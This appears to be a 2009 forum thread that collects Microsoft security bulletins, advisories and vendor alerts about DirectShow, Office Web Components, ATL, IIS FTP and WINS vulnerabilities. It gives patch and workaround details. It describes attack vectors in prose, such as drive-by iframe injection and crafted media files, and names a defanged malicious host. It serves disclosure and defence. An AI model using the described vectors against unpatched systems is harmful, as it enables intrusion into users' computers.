- http://www.microsoft.com/technet/security/bulletin/MS09-024.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...

Important -3-

Microsoft Security Bulletin MS09-026
Vulnerability in RPC Could Allow Elevation of Privilege (970238)
- http://www.microsoft.com/technet/security/bulletin/MS09-026.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-025
Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (968537)
- http://www.microsoft.com/technet/security/bulletin/MS09-025.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-020
Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
- http://www.microsoft.com/technet/security/bulletin/MS09-020.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Moderate -1-

Microsoft Security Bulletin MS09-023
Vulnerability in Windows Search Could Allow Information Disclosure (963093)
- http://www.microsoft.com/technet/security/bulletin/MS09-023.mspx
Maximum Severity Rating: Moderate
Vulnerability Impact: Information Disclosure
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6538
Last Updated: 2009-06-10 13:01:38 UTC ...(Version: 2)
___

- http://www.reuters.com/article/technologyNews/idUSTRE5585IV20090609?sp=true
Jun 9, 2009 - "Microsoft Corp issued software to fix 31 security flaws in its programs, a single-day record for the company whose products are targeted by hackers because they sit on the vast majority of computers..."
___

MSRT
- http://www.microsoft.com/security/malwareremove/default.mspx
Version: 2.11
Knowledge Base (KB) Articles: http://support.microsoft.com/?kbid=890830
Date Published: 6/9/2009 ...
Recent adds:
Win32/Waledac - April 2009 (V 2.9) Moderate
Win32/Winwebsec - May 2009 (V 2.10) Moderate
Win32/InternetAntivirus - June 2009 (V 2.11) Moderate

FYI...

Microsoft Security Advisory (971888)
Update for DNS Devolution
- http://www.microsoft.com/technet/security/advisory/971888.mspx
Published or Last Updated: 6/9/2009

Microsoft Security Advisory (971492)
Vulnerability in Internet Information Services Could Allow Elevation of Privilege
- http://www.microsoft.com/technet/security/advisory/971492.mspx
Published: May 18, 2009 | Updated: June 9, 2009 - "... We have issued MS09-020 to address this issue..." - http://www.microsoft.com/technet/security/Bulletin/MS09-020.mspx

Microsoft Security Advisory (969898)
Update Rollup for ActiveX Kill Bits
- http://www.microsoft.com/technet/security/advisory/969898.mspx
June 9, 2009 - "Microsoft is releasing a new set of ActiveX kill bits with this advisory.
The update includes a kill bit from a previously published Microsoft Cumulative Update:
• Microsoft Visual Basic 6.0 Service Pack 6 Cumulative Update (KB957924)
- http://www.microsoft.com/downloads/details.aspx?FamilyID=cb824e35-0403-45c4-9e41-459f0eb89e36&displaylang=en
The update also includes kill bits for the following third-party software:
• Derivco. This security update sets a kill bit for an ActiveX control developed by Derivco. Derivco has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from Derivco. This kill bit is being set at the request of the owner of the ActiveX controls...
• eBay Advanced Image Upload Component. This security update sets a kill bit for an ActiveX control developed by eBay. eBay has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from eBay. This kill bit is being set at the request of the owner of the ActiveX controls...
• HP Virtual Room v7.0. This security update sets a kill bit for an ActiveX control developed by Research In Motion (RIM). RIM has released a security update that addresses a vulnerability in the affected component. For more information and download locations, see the security release from HP. This kill bit is being set at the request of the owner of the ActiveX controls..."

Microsoft Security Advisory (945713)
Vulnerability in Web Proxy Auto-Discovery (WPAD) Could Allow Information Disclosure
- http://www.microsoft.com/technet/security/advisory/945713.mspx
Published: December 3, 2007 | Updated: June 9, 2009 - "... We have issued MS09-008 to address the WPAD issue and have released configuration guidance and updates for DNS devolution in Microsoft Security Advisory 971888. The vulnerabilities addressed are DNS Server Vulnerability in WPAD Registration Vulnerability CVE-2009-0093 and WPAD WINS Server Registration Vulnerability CVE-2009-0094..."
- http://www.microsoft.com/technet/security/Bulletin/MS09-008.mspx
- http://www.microsoft.com/technet/security/advisory/971888.mspx
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0093
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0094

:fear:

FYI...

DirectShow Exploit In the Wild, Part II
- http://preview.tinyurl.com/lhmtkd
06-19-2009 Symantec Security Response Blog - "... With no patch for this vulnerability available as of yet, the fact that we are seeing this exploit used more commonly in the wild is worrying... To trigger this vulnerability, attackers are currently enticing users to visit a malicious page. Attackers have become quite adept at doing this by embedding iframe tags in legitimate pages, among other techniques. This is the most likely attack vector. We have seen iframe tags pointing to this exploit inside phishing pages already and we do expect to see iframe tags added to more pages. The vulnerability exists in the code within Microsoft DirectX and can be triggered by a specially crafted QuickTime media file. The attackers Web page will try to play the malicious QuickTime file, not using the QuickTime player, but using Windows Media Player instead. This will trigger the vulnerability and allow the attacker to execute code on the visitor’s computer. The vulnerable code exists in quartz.dll and is a null-byte overwrite. It allows the attacker to overwrite just one byte of memory with a null byte... (end-user) work-around*."
* http://support.microsoft.com/kb/971778#FixItForMeAlways
June 3, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://www.microsoft.com/technet/security/advisory/971778.mspx

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1537
Last revised: 06/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service...

:fear::mad:

FYI...

0-day in MS DirectShow (msvidctl.dll) used in drive-by attacks
- http://isc.sans.org/diary.html?storyid=6733
Last Updated: 2009-07-06 08:56:55 UTC - "A 0-day exploit within the msVidCtl component of Microsoft DirectShow is actively being exploited through drive-by attacks using thousands of newly compromised web sites, according to CSIS. The code has been published in the public domain via a number of Chinese web sites. Please keep a watchful eye on your AV and IDS/IPS vendors updates to ensure coverage as early as possible on this exploit as it is likely to be widely deployed with the code being available. A valid work around for the attack vector is available which set's the kill bit on the vulnerable DLL.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerActiveX Compatibility{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400 ..."

- http://securitylabs.websense.com/content/Alerts/3432.aspx
07.06.2009 - "Websense... is currently tracking -legitimate- sites that have been compromised to lead to a zero-day exploit targeting an Internet Explorer vulnerability. The compromised sites lead to a handful of payload sites hosting the exploit code which targets msvidctl.dll - an ActiveX control for streaming video. The new zero-day exploit has been added to other exploits on Chinese payload sites. We have been monitoring these sites, which have been systematically injected throughout the last year..."

- http://secunia.com/advisories/35683/2/
Release Date: 2009-07-06
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
OS: Microsoft Windows XP Home Edition, Microsoft Windows XP Professional ...
... The vulnerability is caused due to a boundary error in the ActiveX control for streaming video (msvidctl.dll) and can be exploited to cause a stack-based buffer overflow via specially crafted image content.
Successful exploitation allows execution of arbitrary code when a user e.g. visits a malicious website.
NOTE: The vulnerability is currently being actively exploited...
Solution: Set the kill-bit for the affected ActiveX control...

- http://www.f-secure.com/weblog/archives/00001716.html
July 6, 2009 - "... The exploit targets Microsoft Internet Explorer… so one work around is kind of obvious. Use some other browser besides Internet Explorer until this vulnerability is patched..."

>>> http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

:fear:

FYI...

Microsoft Security Advisory (972890)
Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/972890.mspx
July 06, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Video ActiveX Control. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability.
Our investigation has shown that there are no by-design uses for this ActiveX Control in Internet Explorer which includes all of the Class Identifiers within the msvidctl.dll that hosts this ActiveX Control. For Windows XP and Windows Server 2003 customers, Microsoft is recommending removing support for this ActiveX Control within Internet Explorer using all the Class Identifiers listed in the Workaround section. Though unaffected by this vulnerability, Microsoft is recommending that Windows Vista and Windows Server 2008 customers remove support for this ActiveX Control within Internet Explorer using the same Class Identifiers as a defense-in-depth measure. Customers may prevent the Microsoft Video ActiveX Control from running in Internet Explorer, either manually using the instructions in the Workaround section or automatically using the solution found in Microsoft Knowledge Base Article 972890*..."
* http://support.microsoft.com/kb/972890#FixItForMe
July 6, 2009 (Get the Enable Workaround "FixIt" here. MUST be run in Admin mode.)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0015
Last revised: 07/09/2009
CVSS v2 Base Score: 9.3 (HIGH)
Impact Type: Provides administrator access, Allows complete confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service ...

- http://securitylabs.websense.com/content/Blogs/3434.aspx
07.09.2009

:fear:

FYI...

IE 0day exploit domains...
- http://isc.sans.org/diary.html?storyid=6739
Last Updated: 2009-07-07 02:33:54 UTC - "This diary entry contains a list of domains that are exploiting the new IE-0day as well as secondary domains that are hosting potentially malicious binaries utilized in these attacks. This list has been produced as a combined effort of researchers, vendors, and volunteers. You can thank the groups below for their efforts and their willingness to share this information with the public. This list is intended to serve as a quick way to provide protection against these attacks by identifying domains that are hosting these (and potentially other) exploits. This list is not formatted for any specific file format, it is up to you the reader to translate this date into the proper formatting that your environment requires... The information provided has had varying degrees of verification performed on it. As such this information is provided as is. There may very well be mistakes, mistakes that may result in legitimate sites being blocked if you choose to use this list as a block list..."

:fear:

FYI...

0-day exploit leads to KILLAV
- http://blog.trendmicro.com/zero-day-microsoft-directshow-mpeg2tunerequest-exploit-leads-to-killav-malware/
July 6, 2009 - "... Around 967 Chinese websites are reported to be infected by a malicious script that leads users to successive site redirections and lands them to download a .JPG file containing the exploit. Trend Micro detects it as JS_DLOADER.BD... Upon successful exploitation, the script downloads another malware detected as WORM_KILLAV.AI. This malware disables and terminates antivirus software processes, and drops other malware on the affected system..."
(Screenshots available at the URL above.)

Edit/update - see: http://secunia.com/advisories/35683/2/
Last Update: 2009-07-14
Solution Status: Vendor Patch
MS09-032 (KB973346):
http://www.microsoft.com/technet/security/Bulletin/MS09-032.mspx ...

:fear::spider::fear:

FYI...

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
July 13, 2009 - "Microsoft is investigating a privately reported vulnerability in Microsoft Office Web Components. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. When using Internet Explorer, code execution is remote and may not require any user intervention. We are aware of attacks attempting to exploit the vulnerability. Customers may prevent the Microsoft Office Web Components from running in Internet Explorer either manually, using the instructions in the Workaround section, or automatically, using the solution found in Microsoft Knowledge Base Article 973472*..."
* http://support.microsoft.com/kb/973472#FixItForMe
July 13, 2009 - Revision: 1.2

- http://secunia.com/advisories/35800/2/
Release Date: 2009-07-13
Critical: Extremely critical
Impact: System access
Where: From remote
Solution Status: Unpatched
Solution: Set the kill-bit for the affected ActiveX control.
Provided and/or discovered by: Reported as a 0-day...

- http://isc.sans.org/diary.html?storyid=6778
Last Updated: 2009-07-14 01:35:23 UTC ...(Version: 8) - "... This vulnerability exists in the ActiveX control used by IE to display Excel spreadsheets... we are seeing active exploit pages... Start working on this ASAP. The impact is remote code execution with the privileges of the logged in user running Internet Explorer, and might not require user intervention. As in browse to a nasty web site and be pwn3d..."

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136

:fear:

FYI...

- http://www.microsoft.com/technet/security/bulletin/ms09-jul.mspx
July 14, 2009 - "This bulletin summary lists security bulletins released for July 2009...
(Total of -6-)

Critical -3-

Microsoft Security Bulletin MS09-029
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution (961371)
- http://www.microsoft.com/technet/security/bulletin/MS09-029.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-028
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (971633)
- http://www.microsoft.com/technet/security/bulletin/MS09-028.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-032
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/MS09-032.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows...

Important -3-

Microsoft Security Bulletin MS09-033
Vulnerability in Virtual PC and Virtual Server Could Allow Elevation of Privilege (969856)
- http://www.microsoft.com/technet/security/bulletin/MS09-033.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Virtual PC, Virtual Server...

Microsoft Security Bulletin MS09-031
Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege (970953)
- http://www.microsoft.com/technet/security/bulletin/MS09-031.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft ISA Server...

Microsoft Security Bulletin MS09-030
Vulnerability in Microsoft Publisher Could Allow Remote Code Execution (969516)
- http://www.microsoft.com/technet/security/bulletin/MS09-030.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office...
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6790
Last Updated: 2009-07-14 17:34:08 UTC - "...MS09-032 - Note there are recently discovered killbits one should set that are -not- included in this update..." (See: http://support.microsoft.com/kb/973472#FixItForMe - July 14, 2009)
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: July 14, 2009
(Recent additions)
Win32/Winwebsec May 2009 (V 2.10) Moderate
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate

FYI...

Microsoft Security Bulletin MS09-032 - Critical
Cumulative Security Update of ActiveX Kill Bits (973346)
- http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
Published: July 14, 2009 | Updated: July 15, 2009
"... Frequently Asked Questions (FAQ) Related to This Security Update
If I have applied the workaround from Microsoft Security Advisory 972890, do I need to install this security update?
Microsoft Security Advisory 972890 describes a workaround that prevents the Microsoft Video ActiveX Control from running in Internet Explorer. Customers can either manually apply this workaround or use the automated Microsoft Fix it solution in Microsoft Knowledge Base Article 972890 to enable the workaround. Customers who have applied this workaround using either method do -not- need to install this security update.
... Customers who want this update to be offered to Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems must remove the kill bit settings previously applied by the workaround by deleting the registry keys referenced in the workaround, "Prevent COM objects from running in Internet Explorer."
• V1.1 (July 15, 2009): Clarified a FAQ about the workaround from Microsoft Security Advisory 972890, added a FAQ about Microsoft Security Advisory 973472, and added a FAQ about the kill bits contained in this bulletin.

- http://windowssecrets.com/2009/07/16/07-Killbit-update-requires-Fix-it-undo-for-XP-PCs
July 16, 2009 - "... Anyone who applied the Fix-it workaround won't see the cumulative patch among the updates being offered to XP systems because the workaround removed the affected Registry keys."

FYI...

MS OWC vuln used in site compromise
- http://securitylabs.websense.com/content/Alerts/3451.aspx
07.27.2009 - "Websense... has discovered that the Center for Defense Information (CDI) Web site has been compromised. The site is injected with a JavaScript code that exploits the latest Microsoft Office Web Components Control vulnerability... The vulnerability is in the Internet Explorer ActiveX control used to display Excel spreadsheets (CVE-2009-1136)... The exploit code pushes a Trojan from hxxp ://vicp .cc/. The Trojan has more than 50% detection*. Note that Microsoft provides a workaround for the problem in their Fixit** program..."

* http://www.virustotal.com/analisis/0ef75757f2f8e8a4ea1aa4288d52eb2deb8b9df804af33da9f0ef3baee60138c-1248724806
File solar.exe received on 2009.07.27 20:00:06 (UTC)
Result: 24/41 (58.54%)

** http://support.microsoft.com/kb/973472#FixItForMe

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1136
Last revised: 07/16/2009
CVSS v2 Base Score: 9.3 (HIGH)

:mad:

FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
July 28, 2009 - "Microsoft is releasing this security advisory to provide information about our ongoing investigation into vulnerabilities in the public and private versions of Microsoft's Active Template Library (ATL). This advisory also provides guidance as to what developers can do to help ensure that the controls and components they have built are not vulnerable to the ATL issues; what IT Professionals and consumers can do to mitigate potential attacks that use the vulnerabilities; and what Microsoft is doing as part of its ongoing investigation into the issue described in this advisory. This security advisory will also provide a comprehensive listing of all Microsoft Security Bulletins and Security Updates related to the vulnerabilities in ATL. Microsoft's investigation into the private and public versions of ATL is ongoing, and we will release security updates and guidance as appropriate as part of the investigation process...
Updates related to ATL: Updates released on July 28, 2009...

Microsoft Security Bulletin MS09-034 - Critical
Cumulative Security Update for Internet Explorer (972260)
- http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
July 28, 2009

Microsoft Security Bulletin MS09-035 - Moderate
Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706)
- http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
July 28, 2009

- http://www.microsoft.com/technet/security/bulletin/ms09-jul-ans.mspx
• V2.0 (July 28, 2009): Added Microsoft Security Bulletins MS09-034, Cumulative Security Update for Internet Explorer (972260), and MS09-035, Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution (969706). Also added the bulletin webcast links for these out-of-band security bulletins.
___

- http://isc.sans.org/diary.html?storyid=6874
Last Updated: 2009-07-28 17:19:30 UTC ...(Version: 2)
___

- http://secunia.com/advisories/35962/2/
Release Date: 2009-07-28
Critical: Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Internet Explorer v5 - v8 ...
Solution: Apply patches...
Original Advisory: MS09-034 (KB972260):
http://www.microsoft.com/technet/security/Bulletin/MS09-034.mspx
Other References: Microsoft Security Advisory (KB973882):
http://www.microsoft.com/technet/security/advisory/973882.mspx ...

- http://secunia.com/advisories/35967/2/
Release Date: 2009-07-28
Critical: Moderately critical
Impact: System access, Exposure of sensitive information, Security Bypass
Where: From remote
Solution Status: Vendor Patch
Software: Microsoft Visual C++ (multiple versions), Microsoft Visual Studio (multiple versions)...
Original Advisory: MS09-035 (KB969706, KB971089, KB971090, KB971091, KB971092, KB973544, KB973551, KB973552, KB973830):
http://www.microsoft.com/technet/security/Bulletin/MS09-035.mspx ...

- http://www.sophos.com/blogs/sophoslabs/v/post/5627
July 28, 2009 - "...MS09-035 fixes the actual ATL code included with several versions of Microsoft Visual Studio so that the new ActiveX components compiled with the fixed ATL code are not affected by the incorrect pointer passing vulnerability in CComVariant::ReadFromStream function. Developers of ActiveX components that use ATL are advised to recompile and update their components using the fixed version of the Active Template Library...."

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-aug.mspx
August 11, 2009 - "This bulletin summary lists security bulletins released for August 2009... (Total of -9-)

Critical -5-

Microsoft Security Bulletin MS09-043
Vulnerabilities in Microsoft Office Web Components Could Allow Remote Code Execution (957638)
- http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Office, Microsoft Visual Studio, Microsoft ISA Server, Microsoft BizTalk Server...

Microsoft Security Bulletin MS09-044
Vulnerabilities in Remote Desktop Connection Could Allow Remote Code Execution (970927)
- http://www.microsoft.com/technet/security/bulletin/MS09-044.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows, Remote Desktop Connection Client for Mac...

Microsoft Security Bulletin MS09-039
Vulnerabilities in WINS Could Allow Remote Code Execution (969883)
- http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-038
Vulnerabilities in Windows Media File Processing Could Allow Remote Code Execution (971557)
- http://www.microsoft.com/technet/security/bulletin/MS09-038.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-037
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution (973908)
- http://www.microsoft.com/technet/security/bulletin/MS09-037.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Important -4-

Microsoft Security Bulletin MS09-041
Vulnerability in Workstation Service Could Allow Elevation of Privilege (971657)
- http://www.microsoft.com/technet/security/bulletin/MS09-041.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-040
Vulnerability in Message Queuing Could Allow Elevation of Privilege (971032)
- http://www.microsoft.com/technet/security/bulletin/MS09-040.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Elevation of Privilege
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...

Microsoft Security Bulletin MS09-036
Vulnerability in ASP.NET in Microsoft Windows Could Allow Denial of Service (970957)
- http://www.microsoft.com/technet/security/bulletin/MS09-036.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Denial of Service
Restart Requirement: Does not require restart
Affected Software: Microsoft Windows, Microsoft .NET Framework...

Microsoft Security Bulletin MS09-042
Vulnerability in Telnet Could Allow Remote Code Execution (960859)
- http://www.microsoft.com/technet/security/bulletin/MS09-042.mspx
Maximum Severity Rating: Important
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows...
___

Severity and Exploitabilty Index (chart)
- http://blogs.technet.com/photos/msrcteam/images/3272462/original.aspx
___

ISC Analysis
- http://isc.sans.org/diary.html?storyid=6937
Last Updated: 2009-08-11 19:22:14 UTC
___

MSRT
- http://support.microsoft.com/?kbid=890830
Release Date: 8/11/2009
(Recent additions)
Win32/InternetAntivirus June 2009 (V 2.11) Moderate
Win32/FakeSpypro July 2009 (V 2.12) Moderate
Win32/FakeRean August 2009 (V 2.13) Moderate

FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
Published: July 28, 2009 | Updated: August 11, 2009 - "...Updates related to ATL:
- Updates released on August 11, 2009
• MS09-037 - Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/bulletin/ms09-037.mspx
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
Published: July 28, 2009 | Updated: August 11, 2009
http://www.microsoft.com/technet/security/bulletin/ms09-035.mspx
- Updates released on July 28, 2009
• MS09-035 - Vulnerabilities in Visual Studio Active Template Library Could Allow Remote Code Execution
• MS09-034 - Cumulative Security Update for Internet Explorer
http://www.microsoft.com/technet/security/bulletin/ms09-034.mspx
- Update released on July 14, 2009
• MS09-032 - Cumulative Security Update of ActiveX Kill Bits
http://www.microsoft.com/technet/security/bulletin/ms09-032.mspx
___

Microsoft Security Advisory (973811)
Extended Protection for Authentication
- http://www.microsoft.com/technet/security/advisory/973811.mspx
Published: August 11, 2009 - "Microsoft is announcing the availability of a new feature, Extended Protection for Authentication, on the Windows platform. This feature enhances the protection and handling of credentials when authenticating network connections using Integrated Windows Authentication (IWA). The update itself does not directly provide protection against specific attacks such as credential forwarding, but allows applications to opt-in to Extended Protection for Authentication. This advisory briefs developers and system administrators on this new functionality and how it can be deployed to help protect authentication credentials... Apply the updates associated with security bulletin MS09-042...
http://www.microsoft.com/technet/security/bulletin/ms09-042.mspx

Microsoft Security Advisory (973472)
Vulnerability in Microsoft Office Web Components Control Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973472.mspx
Published: July 13, 2009 | Updated: August 11, 2009 - "... We have issued MS09-043* to address this issue..."
* http://www.microsoft.com/technet/security/bulletin/ms09-043.mspx

.

FYI...

- http://isc.sans.org/diary.html?storyid=6976
Last Updated: 2009-08-18 10:24:24 UTC - "... the MS09-039* vulnerability is actively exploited in the wild. To remind you, this vulnerability affects servers with the WINS service installed. The patch fixes two vulnerabilities. We do not have any technical information yet. However, the DShield graph shows a relatively high increase in targets for port 42 (see http://isc.sans.org/port.html?port=42 )... TCP port 42 is used for WINS replication..."
* http://www.microsoft.com/technet/security/bulletin/MS09-039.mspx

:fear::fear:

FYI...

Microsoft Security Advisory (973882)
Vulnerabilities in Microsoft Active Template Library (ATL) Could Allow Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/973882.mspx
• V3.0 (August 25, 2009): Advisory revised to provide details about the Windows Live Messenger* 14.0.8089 release and to communicate the removal of the Windows Live Hotmail "Attach Photo" feature.

* http://download.live.com/messenger

:fear:

FYI...

MSRT August Top Detection Reports
- http://blogs.technet.com/mmpc/archive/2009/08/27/msrt-august-top-detection-reports.aspx
August 27, 2009

:fear:

FYI...

Microsoft Security Advisory (967940)
Update for Windows Autorun
- http://www.microsoft.com/technet/security/advisory/967940.mspx
• V1.1 (August 25, 2009): Summary revised to notify users of an update to Autorun that restricts AutoPlay functionality to CD-ROM and DVD-ROM media, available for Windows XP, Windows Server 2003, Windows Vista, and Windows Server 2008 from Microsoft Knowledge Base Article 971029*.
* http://support.microsoft.com/kb/971029

:fear:

FYI...

Microsoft Security Advisory (975191)
Vulnerability in Internet Information Services FTP Service Could Allow for Remote Code Execution
- http://www.microsoft.com/technet/security/advisory/975191.mspx
September 01, 2009 - "Microsoft is investigating new public reports of a vulnerability in the FTP Service in Microsoft Internet Information Services (IIS) 5.0, Microsoft Internet Information Services (IIS) 5.1, and Microsoft Internet Information Services (IIS) 6.0. The vulnerability could allow remote code execution on affected systems that are running the FTP service and are connected to the Internet. Microsoft is aware that detailed exploit code has been published on the Internet for this vulnerability. Microsoft is -not- currently aware of active attacks that use this exploit code or of customer impact at this time...
(See: )
Workarounds...
Additional Suggested Actions..."
* http://support.microsoft.com/kb/975191
September 2, 2009

> http://secunia.com/advisories/36443/2/
Release Date: 2009-09-01

- http://www.microsoft.com/technet/security/advisory/975191.mspx
"... Microsoft is currently aware of limited attacks that use this exploit code..."
Workarounds...
• Do not allow FTP write access to anonymous users...
• Do not allow FTP access to anonymous users...
• Modify NTFS file system permissions to disallow directory creation by FTP users...
• Upgrade to FTP Service 7.5 - FTP Service 7.5 is available for Windows Vista and Windows Server 2008. This version of FTP Service is not affected by the vulnerabilities in this advisory...
• Disable the FTP Service...
---
• V2.0 (September 3, 2009): Advisory revised to add CVE-2009-2521 and to provide more information on affected software, mitigations, and workarounds.

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3023
Last revised: 09/04/2009
CVSS v2 Base Score: 9.0 (HIGH)

- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2521
Last revised: 09/04/2009

:fear:

FYI...

- http://www.microsoft.com/technet/security/Bulletin/MS09-sep.mspx
September 08, 2009 - "This bulletin summary lists security bulletins released for September 2009... security bulletins for this month in order of severity... (Total of -5-)

Critical -5-

Microsoft Security Bulletin MS09-045
Vulnerability in JScript Scripting Engine Could Allow Remote Code Execution (971961)
- http://www.microsoft.com/technet/security/bulletin/MS09-045.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-049
Vulnerability in Wireless LAN AutoConfig Service Could Allow Remote Code Execution (970710)
- http://www.microsoft.com/technet/security/bulletin/MS09-049.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-047
Vulnerabilities in Windows Media Format Could Allow Remote Code Execution (973812)
- http://www.microsoft.com/technet/security/bulletin/MS09-047.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-048
Vulnerabilities in Windows TCP/IP Could Allow Remote Code Execution (967723)
- http://www.microsoft.com/technet/security/bulletin/MS09-048.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: Requires restart
Affected Software: Microsoft Windows

Microsoft Security Bulletin MS09-046
Vulnerability in DHTML Editing Component ActiveX Control Could Allow Remote Code Execution (956844)
- http://www.microsoft.com/technet/security/bulletin/MS09-046.mspx
Maximum Severity Rating: Critical
Vulnerability Impact: Remote Code Execution
Restart Requirement: May require restart
Affected Software: Microsoft Windows
___

MS09-045 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1920
MS09-046 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2519
MS09-047 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2498
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2499
MS09-048 - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-4609
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1925
